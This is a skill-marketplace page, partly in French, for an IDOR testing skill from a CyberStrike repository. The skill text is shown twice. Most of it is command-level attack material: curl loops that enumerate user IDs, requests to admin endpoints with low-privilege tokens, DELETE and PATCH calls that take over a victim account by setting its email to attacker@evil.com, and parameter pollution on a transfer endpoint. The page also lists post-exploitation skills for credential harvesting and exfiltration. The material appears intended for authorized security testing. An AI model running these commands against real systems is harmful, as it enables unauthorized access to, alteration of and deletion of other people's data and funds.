Exécutez n'importe quel Skill dans Manus
en un clic

Exécutez n'importe quel Skill dans Manus en un clic

Commencer

attack-idor-automation

Étoiles617

Forks102

Mis à jour1 juin 2026 à 19:16

IDOR automated testing — cross-account access, horizontal/vertical privilege escalation, mass data exposure

Installation

Installer avec Codex ou Claude Copiez ce prompt, collez-le dans Codex, Claude ou un autre assistant, puis laissez-le vérifier la page du skill et l'installer pour vous.

Exécuter dans Manus

Source

CyberStrikeus

CyberStrikeus/CyberStrike

Ouvrir le dépôt GitHub Voir les dépôts du créateur

Téléchargement

Exécuter dans Manus

Métiers associésSOC

Basé sur la classification professionnelle SOC

Analystes en sécurité de l'informationProfessions informatiques et mathématiques·SOC 15-1212

SKILL.md

readonly

name	attack-idor-automation
description	IDOR automated testing — cross-account access, horizontal/vertical privilege escalation, mass data exposure
category	web-application
version	1.0
author	cyberstrike-official
tags	["idor","bac","access-control","web","attack"]
tech_stack	["web"]
cwe_ids	["CWE-639","CWE-284"]
chains_with	["attack-jwt","attack-graphql"]
prerequisites	[]
severity_boost	{"attack-jwt":"JWT tamper + IDOR = full account takeover"}

IDOR Automated Testing

Objective

Systematically test all API endpoints for Insecure Direct Object Reference vulnerabilities using two accounts with different privilege levels.

Testing Methodology

Phase 1: Set Up Two Accounts

Account A (victim) — owns resources being tested
Account B (attacker) — tries to access Account A's resources

Phase 2: Automated Cross-Account Testing

# Test endpoints from file
attack_script idor_tester \
  --token-a "VICTIM_JWT" \
  --token-b "ATTACKER_JWT" \
  --endpoints endpoints.txt \
  --json-output

# Test comma-separated endpoints
attack_script idor_tester \
  --token-a "VICTIM_JWT" \
  --token-b "ATTACKER_JWT" \
  --endpoints "https://TARGET/api/users/123,https://TARGET/api/orders/456,https://TARGET/api/profile/123" \
  --method GET

# Test write operations
attack_script idor_tester \
  --token-a "VICTIM_JWT" \
  --token-b "ATTACKER_JWT" \
  --endpoints endpoints.txt \
  --method PUT \
  --data '{"name":"pwned"}'

Phase 3: Manual Testing Patterns

Horizontal IDOR (same role, different user):

# Sequential IDs
curl -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/1
curl -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/2

# UUID guessing (if predictable)
curl -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/UUID_OF_OTHER_USER

# Endpoint enumeration
for id in $(seq 1 100); do
  curl -s -o /dev/null -w "%{http_code} " -H "Authorization: Bearer ATTACKER_TOKEN" "https://TARGET/api/orders/$id"
done

Vertical IDOR (low-priv accessing high-priv):

# User accessing admin endpoints
curl -H "Authorization: Bearer USER_TOKEN" https://TARGET/api/admin/users
curl -H "Authorization: Bearer USER_TOKEN" https://TARGET/api/admin/settings
curl -H "Authorization: Bearer USER_TOKEN" https://TARGET/api/internal/reports

Phase 4: HTTP Method Switching

# GET blocked but DELETE works
curl -X DELETE -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/VICTIM_ID

# GET blocked but PATCH works
curl -X PATCH -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/VICTIM_ID \
  -d '{"email":"attacker@evil.com"}'

Phase 5: Parameter Pollution

# Dual ID injection
curl "https://TARGET/api/profile?user_id=ATTACKER&user_id=VICTIM"

# Body override
curl -X POST https://TARGET/api/transfer \
  -H "Authorization: Bearer ATTACKER_TOKEN" \
  -d '{"from":"VICTIM_ID","to":"ATTACKER_ID","amount":1000}'

Phase 6: Response Comparison

# Compare responses between two auth contexts
attack_script response_diff "https://TARGET/api/users/VICTIM_ID" \
  --header-a "Authorization:Bearer VICTIM_TOKEN" \
  --header-b "Authorization:Bearer ATTACKER_TOKEN" \
  --json-output

What Constitutes a Finding

Finding	Severity
Read other user's PII (email, SSN, etc.)	Critical (P1)
Modify other user's data	Critical (P1)
Delete other user's resources	Critical (P1)
Access admin functionality	Critical (P1)
Read non-sensitive data of other user	Medium (P3)

Evidence Requirements

Two different auth tokens used
Endpoint tested
Account A (victim) response as baseline
Account B (attacker) accessing Account A's resource
Data received proving cross-account access

Tools

attack_script idor_tester — automated cross-account testing
attack_script response_diff — response comparison
attack_script jwt_tamper — token manipulation for IDOR

References

Plus depuis ce dépôt

même dépôt

ebpf-attacks

CyberStrikeus/CyberStrike

eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux

2026-06-23617

aws-postexploit

CyberStrikeus/CyberStrike

AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3

2026-06-22617

azure-postexploit

CyberStrikeus/CyberStrike

Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation

2026-06-22617

cicd-attacks

CyberStrikeus/CyberStrike

CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab

2026-06-22617

k8s-postexploit

CyberStrikeus/CyberStrike

Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence

2026-06-22617

macos-postexploit

CyberStrikeus/CyberStrike

macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools

2026-06-22617

name	attack-idor-automation
description	IDOR automated testing — cross-account access, horizontal/vertical privilege escalation, mass data exposure
category	web-application
version	1.0
author	cyberstrike-official
tags	["idor","bac","access-control","web","attack"]
tech_stack	["web"]
cwe_ids	["CWE-639","CWE-284"]
chains_with	["attack-jwt","attack-graphql"]
prerequisites	[]
severity_boost	{"attack-jwt":"JWT tamper + IDOR = full account takeover"}

IDOR Automated Testing

Objective

Systematically test all API endpoints for Insecure Direct Object Reference vulnerabilities using two accounts with different privilege levels.

Testing Methodology

Phase 1: Set Up Two Accounts

Account A (victim) — owns resources being tested
Account B (attacker) — tries to access Account A's resources

Phase 2: Automated Cross-Account Testing

# Test endpoints from file
attack_script idor_tester \
  --token-a "VICTIM_JWT" \
  --token-b "ATTACKER_JWT" \
  --endpoints endpoints.txt \
  --json-output

# Test comma-separated endpoints
attack_script idor_tester \
  --token-a "VICTIM_JWT" \
  --token-b "ATTACKER_JWT" \
  --endpoints "https://TARGET/api/users/123,https://TARGET/api/orders/456,https://TARGET/api/profile/123" \
  --method GET

# Test write operations
attack_script idor_tester \
  --token-a "VICTIM_JWT" \
  --token-b "ATTACKER_JWT" \
  --endpoints endpoints.txt \
  --method PUT \
  --data '{"name":"pwned"}'

Phase 3: Manual Testing Patterns

Horizontal IDOR (same role, different user):

# Sequential IDs
curl -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/1
curl -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/2

# UUID guessing (if predictable)
curl -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/UUID_OF_OTHER_USER

# Endpoint enumeration
for id in $(seq 1 100); do
  curl -s -o /dev/null -w "%{http_code} " -H "Authorization: Bearer ATTACKER_TOKEN" "https://TARGET/api/orders/$id"
done

Vertical IDOR (low-priv accessing high-priv):

# User accessing admin endpoints
curl -H "Authorization: Bearer USER_TOKEN" https://TARGET/api/admin/users
curl -H "Authorization: Bearer USER_TOKEN" https://TARGET/api/admin/settings
curl -H "Authorization: Bearer USER_TOKEN" https://TARGET/api/internal/reports

Phase 4: HTTP Method Switching

# GET blocked but DELETE works
curl -X DELETE -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/VICTIM_ID

# GET blocked but PATCH works
curl -X PATCH -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/VICTIM_ID \
  -d '{"email":"attacker@evil.com"}'

Phase 5: Parameter Pollution

# Dual ID injection
curl "https://TARGET/api/profile?user_id=ATTACKER&user_id=VICTIM"

# Body override
curl -X POST https://TARGET/api/transfer \
  -H "Authorization: Bearer ATTACKER_TOKEN" \
  -d '{"from":"VICTIM_ID","to":"ATTACKER_ID","amount":1000}'

Phase 6: Response Comparison

# Compare responses between two auth contexts
attack_script response_diff "https://TARGET/api/users/VICTIM_ID" \
  --header-a "Authorization:Bearer VICTIM_TOKEN" \
  --header-b "Authorization:Bearer ATTACKER_TOKEN" \
  --json-output

What Constitutes a Finding

Finding	Severity
Read other user's PII (email, SSN, etc.)	Critical (P1)
Modify other user's data	Critical (P1)
Delete other user's resources	Critical (P1)
Access admin functionality	Critical (P1)
Read non-sensitive data of other user	Medium (P3)

Evidence Requirements

Two different auth tokens used
Endpoint tested
Account A (victim) response as baseline
Account B (attacker) accessing Account A's resource
Data received proving cross-account access

Tools

attack_script idor_tester — automated cross-account testing
attack_script response_diff — response comparison
attack_script jwt_tamper — token manipulation for IDOR